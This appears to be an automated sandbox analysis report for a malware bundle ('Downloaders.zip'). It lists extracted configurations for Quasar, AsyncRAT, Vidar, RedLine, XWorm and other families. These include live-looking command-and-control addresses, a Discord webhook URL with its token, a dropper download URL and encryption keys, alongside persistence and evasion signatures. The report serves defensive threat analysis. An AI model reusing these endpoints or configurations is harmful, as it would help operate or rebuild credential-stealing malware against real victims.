asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
705s
max time network
761s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
28/11/2024, 02:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloaders.zip
Size

12KB
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

a35ec7b7-5a95-4207-8f25-7af0a7847fa5

Attributes

encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
install_name
User Application Data.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windowns Client Startup
subdirectory
Quasar

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

14.243.221.170:2654

192.168.43.241:4782

Mutex

a7b38fdd-192e-4e47-b9ba-ca9eb81cc7bd

Attributes

encryption_key
8B9AD736E943A06EAF1321AD479071E83805704C
install_name
Runtime Broker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

ZJEB

VIPEEK1990-25013.portmap.host:25013

Mutex

ad21b115-2c1b-40cb-adba-a50736b76c21

Attributes

encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Security Service
subdirectory
SubDir

Extracted

Family

asyncrat

Botnet

Default

technical-southwest.gl.at.ply.gg:58694

forums-appliances.gl.at.ply.gg:1962

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

mercurialgrabber

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

3.70.228.168:555

127.0.0.1:4449

135.181.185.254:4449

Mutex

bslxturcmlpmyqrv

Attributes

delay
1
install
true
install_file
atat.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

3.70.228.168:555

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

66.66.146.74:9511

Mutex

nwJFeGdDXcL2

Attributes

delay
3
install
true
install_file
System32.exe
install_folder
%AppData%

aes.plain

Extracted

Family

vidar

Version

11.1

Botnet

df523263f44cc8d55414a260a0197e4a

https://steamcommunity.com/profiles/76561199786602107

https://t.me/lpnjoke

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Family

metasploit

Version

metasploit_stager

144.34.162.13:3333

Extracted

Family

quasar

Version

1.4.0

Botnet

svhost

151.177.61.79:4782

Mutex

a148a6d8-1253-4e62-bc5f-c0242dd62e69

Attributes

encryption_key
5BEC1A8BC6F8F695D1337C51454E0B7F3A4FE968
install_name
svhost.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svhost
subdirectory
svhost

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

89.105.223.196:29862

Extracted

Family

xworm

Version

5.0

68.178.207.33:7000

Mutex

sSM7p4MT4JctLnRS

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

xworm

assistance-arbitration.gl.at.ply.gg:12152

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Extracted

Family

quasar

Version

1.4.0

Botnet

Target

127.0.0.1:6070

affasdqa.ddns.net:6070

haffasdqa.duckdns.org:6070

Mutex

670d21b7-71ed-4958-9ba7-a58fa54d8203

Attributes

encryption_key
25B2622CE0635F9A273AB61B1B7D7B94220AC509
install_name
svhoste.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svhoste
subdirectory
SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00270000000453b5-1688.dat	family_umbral
behavioral1/memory/5320-1696-0x0000012F8E1E0000-0x0000012F8E220000-memory.dmp	family_umbral

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral1/files/0x00290000000453ae-1921.dat	family_vidar_v7
behavioral1/memory/4680-1926-0x0000000000460000-0x00000000006D6000-memory.dmp	family_vidar_v7
behavioral1/memory/4680-1960-0x0000000000460000-0x00000000006D6000-memory.dmp	family_vidar_v7

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/memory/7384-5715-0x0000000000D40000-0x0000000000D4E000-memory.dmp	family_xworm
behavioral1/files/0x002a000000045232-5707.dat	family_xworm
behavioral1/files/0x001b0000000457a0-6254.dat	family_xworm
behavioral1/memory/4084-6281-0x0000000000210000-0x0000000000226000-memory.dmp	family_xworm

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
Mercurialgrabber family
mercurialgrabber
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\boot.exe,C:\\Program Files (x86)\\CSMClient\\CyberStation.exe,"	reg.exe

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Netsupport family
netsupport
Njrat family
njrat
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x002a000000045486-2976.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 12 IoCs

resource	yara_rule
behavioral1/files/0x00280000000453a5-1602.dat	family_quasar
behavioral1/memory/5772-1610-0x0000000000970000-0x0000000000C94000-memory.dmp	family_quasar
behavioral1/files/0x00280000000453a6-1615.dat	family_quasar
behavioral1/memory/4428-1623-0x0000000000090000-0x00000000003B4000-memory.dmp	family_quasar
behavioral1/files/0x00280000000453a8-1632.dat	family_quasar
behavioral1/memory/4168-1641-0x0000000000F20000-0x0000000001244000-memory.dmp	family_quasar
behavioral1/files/0x0026000000045436-2063.dat	family_quasar
behavioral1/memory/5628-2076-0x00000000009E0000-0x0000000000D04000-memory.dmp	family_quasar
behavioral1/files/0x001f0000000456f0-5577.dat	family_quasar
behavioral1/memory/7800-5595-0x0000000000350000-0x00000000003D4000-memory.dmp	family_quasar
behavioral1/files/0x001c0000000457a1-6280.dat	family_quasar
behavioral1/memory/740-6289-0x0000000000710000-0x0000000000794000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/7676-5646-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline

Redline family
redline

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 6504 created 3636	6504	2389532921.exe	57
PID 6504 created 3636	6504	2389532921.exe	57
PID 6364 created 3636	6364	winupsecvmgr.exe	57
PID 6364 created 3636	6364	winupsecvmgr.exe	57
PID 6364 created 3636	6364	winupsecvmgr.exe	57

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 5 IoCs

rat

resource	yara_rule
behavioral1/files/0x00280000000453b0-1655.dat	family_asyncrat
behavioral1/files/0x00270000000453b6-1701.dat	family_asyncrat
behavioral1/files/0x00270000000453ba-1768.dat	family_asyncrat
behavioral1/files/0x00280000000453bc-1791.dat	family_asyncrat
behavioral1/files/0x00270000000453c1-1834.dat	family_asyncrat

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	random.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	AUTOKEY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	chrome_93.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	output.exe

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral1/memory/6996-2661-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2667-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2663-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2660-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2659-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2658-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2657-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2656-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2655-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/6996-2654-0x0000000140000000-0x000000014082C000-memory.dmp	xmrig
behavioral1/memory/8148-5065-0x00007FF616930000-0x00007FF617580000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1656	powershell.exe
5560	powershell.exe
4408	powershell.exe
6004	powershell.exe
6740	powershell.exe
228	powershell.exe
1792	powershell.exe
7784	powershell.exe
6400	powershell.exe
4272	powershell.exe
6396	powershell.exe
5560	powershell.exe
7916	powershell.exe
3444	powershell.exe
3472	powershell.exe
4576	powershell.exe
3156	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	saloader.exe
File created	C:\Windows\system32\drivers\etc\hosts	chrome_93.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	procexp64.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	procexp64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "\"C:\\PROGRAM FILES (X86)\\SYSINTERNALS\\PROCEXP64.EXE\""	procexp64.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	output.exe

Modifies Windows Firewall 2 TTPs 3 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4584	netsh.exe
6260	netsh.exe
3692	netsh.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
6676	icacls.exe
7052	icacls.exe
4732	takeown.exe
3376	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	procexp64.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
7912	chrome.exe
7924	chrome.exe
8200	chrome.exe
7428	msedge.exe
8660	msedge.exe
8784	msedge.exe
6680	msedge.exe
7572	chrome.exe
5364	msedge.exe

Checks BIOS information in registry 2 TTPs 9 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	chrome_93.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	AUTOKEY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	AUTOKEY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	chrome_93.exe

Checks computer location settings 2 TTPs 35 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	dsd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	wallx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	FixCSM.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	ApertureLab.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	boot.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	run2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	del.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	1223422352.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	aidans.dont.run.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	xs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	vidar.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	aa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	run.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\automrunner201.ini.lnk	ApertureLab.exe

Executes dropped EXE 64 IoCs

pid	Process
5772	SGVP%20Client%20Users.exe
4428	Registry.exe
5040	Runtime Broker.exe
4168	seksiak.exe
1244	dsd.exe
3452	Loader.exe
1880	output.exe
5320	saloader.exe
2028	aidans.dont.run.exe
4592	handeltest.exe
2840	xs.exe
1732	Tutorial.exe
2564	aa.exe
4832	nobody.exe
1840	ataturk.exe
708	start.exe
2000	svchost.exe
220	windows.exe
5172	seksiak.exe
5244	System32.exe
2512	atat.exe
3684	aspnet_regbrowsers.exe
4680	vidar.exe
5776	seksiak.exe
2352	seksiak.exe
4748	seksiak.exe
5468	seksiak.exe
3432	seksiak.exe
3700	boot.exe
5476	wget.exe
3436	test9.exe
3920	seksiak.exe
5628	discord.exe
6544	Client.exe
6128	wget.exe
6184	AUTOKEY.exe
6920	seksiak.exe
6016	wget.exe
4532	wget.exe
6632	run.exe
7076	run2.exe
1164	wget.exe
6644	wallx.exe
6744	wget.exe
1460	WallpaperX.exe
6632	seksiak.exe
4912	wget.exe
1856	wget.exe
7136	wget.exe
3028	chrome_93.exe
6288	seksiak.exe
5404	FixCSM.exe
5928	seksiak.exe
6748	updater.exe
3376	del.exe
4272	seksiak.exe
6168	ApertureLab.exe
1228	client32.exe
3376	seksiak.exe
664	seksiak.exe
4468	seksiak.exe
3920	seksiak.exe
5984	random.exe
6828	newtpp.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Software\Wine	random.exe

Loads dropped DLL 5 IoCs

pid	Process
1228	client32.exe
1228	client32.exe
1228	client32.exe
1228	client32.exe
1228	client32.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6676	icacls.exe
7052	icacls.exe
4732	takeown.exe
3376	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 19 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x00050000000443f5-2383.dat	themida
behavioral1/memory/6184-2391-0x0000000000400000-0x0000000001413000-memory.dmp	themida
behavioral1/memory/6184-2392-0x0000000000400000-0x0000000001413000-memory.dmp	themida
behavioral1/memory/6184-2393-0x0000000000400000-0x0000000001413000-memory.dmp	themida
behavioral1/memory/6184-2394-0x0000000000400000-0x0000000001413000-memory.dmp	themida
behavioral1/memory/6184-2466-0x0000000000400000-0x0000000001413000-memory.dmp	themida
behavioral1/files/0x002800000004542b-2544.dat	themida
behavioral1/memory/3028-2557-0x00007FF63C1E0000-0x00007FF63D0FF000-memory.dmp	themida
behavioral1/memory/3028-2558-0x00007FF63C1E0000-0x00007FF63D0FF000-memory.dmp	themida
behavioral1/memory/3028-2559-0x00007FF63C1E0000-0x00007FF63D0FF000-memory.dmp	themida
behavioral1/memory/3028-2560-0x00007FF63C1E0000-0x00007FF63D0FF000-memory.dmp	themida
behavioral1/memory/3028-2586-0x00007FF63C1E0000-0x00007FF63D0FF000-memory.dmp	themida
behavioral1/memory/3028-2611-0x00007FF63C1E0000-0x00007FF63D0FF000-memory.dmp	themida
behavioral1/memory/6748-2615-0x00007FF71B8F0000-0x00007FF71C80F000-memory.dmp	themida
behavioral1/memory/6748-2616-0x00007FF71B8F0000-0x00007FF71C80F000-memory.dmp	themida
behavioral1/memory/6748-2617-0x00007FF71B8F0000-0x00007FF71C80F000-memory.dmp	themida
behavioral1/memory/6748-2618-0x00007FF71B8F0000-0x00007FF71C80F000-memory.dmp	themida
behavioral1/memory/6748-2666-0x00007FF71B8F0000-0x00007FF71C80F000-memory.dmp	themida
behavioral1/memory/6184-3690-0x0000000000400000-0x0000000001413000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	newtpp.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	AUTOKEY.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	chrome_93.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	procexp64.exe
File opened (read-only)	\??\T:	procexp64.exe
File opened (read-only)	\??\H:	procexp64.exe
File opened (read-only)	\??\J:	procexp64.exe
File opened (read-only)	\??\M:	procexp64.exe
File opened (read-only)	\??\N:	procexp64.exe
File opened (read-only)	\??\O:	procexp64.exe
File opened (read-only)	\??\P:	procexp64.exe
File opened (read-only)	\??\V:	procexp64.exe
File opened (read-only)	\??\W:	procexp64.exe
File opened (read-only)	\??\E:	procexp64.exe
File opened (read-only)	\??\I:	procexp64.exe
File opened (read-only)	\??\L:	procexp64.exe
File opened (read-only)	\??\A:	procexp64.exe
File opened (read-only)	\??\B:	procexp64.exe
File opened (read-only)	\??\G:	procexp64.exe
File opened (read-only)	\??\S:	procexp64.exe
File opened (read-only)	\??\U:	procexp64.exe
File opened (read-only)	\??\K:	procexp64.exe
File opened (read-only)	\??\Q:	procexp64.exe
File opened (read-only)	\??\X:	procexp64.exe
File opened (read-only)	\??\Y:	procexp64.exe
File opened (read-only)	\??\Z:	procexp64.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
794	raw.githubusercontent.com
807	bitbucket.org
327	raw.githubusercontent.com
410	raw.githubusercontent.com
409	raw.githubusercontent.com
792	raw.githubusercontent.com
806	bitbucket.org
305	raw.githubusercontent.com
306	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
319	ip4.seeip.org
330	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	output.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	output.exe

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
5356	arp.exe

Power Settings 1 TTPs 12 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
6608	powercfg.exe
1580	powercfg.exe
6284	powercfg.exe
1656	powercfg.exe
3828	powercfg.exe
6344	powercfg.exe
1856	powercfg.exe
6708	powercfg.exe
4360	powercfg.exe
8632	powercfg.exe
6408	powercfg.exe
3580	powercfg.exe

System Binary Proxy Execution: Verclsid 1 TTPs 1 IoCs

Adversaries may abuse Verclsid to proxy execution of malicious code.

defense_evasion

Verclsid

T1218.012

pid	Process
2620	verclsid.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00200000000456eb-5624.dat	autoit_exe

Detected potential entity reuse from brand MICROSOFT.
phishing microsoft

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe
File created	C:\Windows\System32\del.exe	wget.exe
File opened for modification	C:\Windows\System32\del.exe	wget.exe
File created	C:\windows\system32\boot.exe	cmd.exe
File opened for modification	C:\windows\system32\boot.exe	cmd.exe
File opened for modification	C:\Windows\system32\MRT.exe	chrome_93.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
6004	tasklist.exe
9076	tasklist.exe
5628	tasklist.exe
7664	tasklist.exe
